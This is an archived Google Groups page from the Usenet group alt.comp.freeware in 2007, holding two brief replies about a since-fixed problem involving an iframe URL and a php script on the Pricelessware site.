To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
bluerhinoceros  
View profile  
 More options Oct 31 2007, 3:02 am
Newsgroups: alt.comp.freeware
From: bluerhinoceros <bluerhinoce...@humanzoo.invalid>
Date: Wed, 31 Oct 2007 00:02:42 -0700
Local: Wed, Oct 31 2007 3:02 am
Subject: Re: Ping Susan -Pricelessware site

It's all over now, somebody fixed something either there or at that
iframe URL. For what it's worth, a Google cached page from Oct 28 shows
different data being passed to that php script than now, commented out.

Cheers.


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Anonymous  
View profile  
 More options Oct 31 2007, 3:05 am
Newsgroups: alt.comp.freeware
From: Anonymous <nob...@remailer.paranoici.org>
Date: Wed, 31 Oct 2007 08:05:22 +0100 (CET)
Local: Wed, Oct 31 2007 3:05 am
Subject: Re: Ping Susan -Pricelessware site

Neither one of them SHOULD.


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Messages 1 - 25 of 68   Newer >
« Back to Discussions « Newer topic     Older topic »

Create a group - Google Groups - Google Home - Terms of Service - Privacy Policy
©2009 Google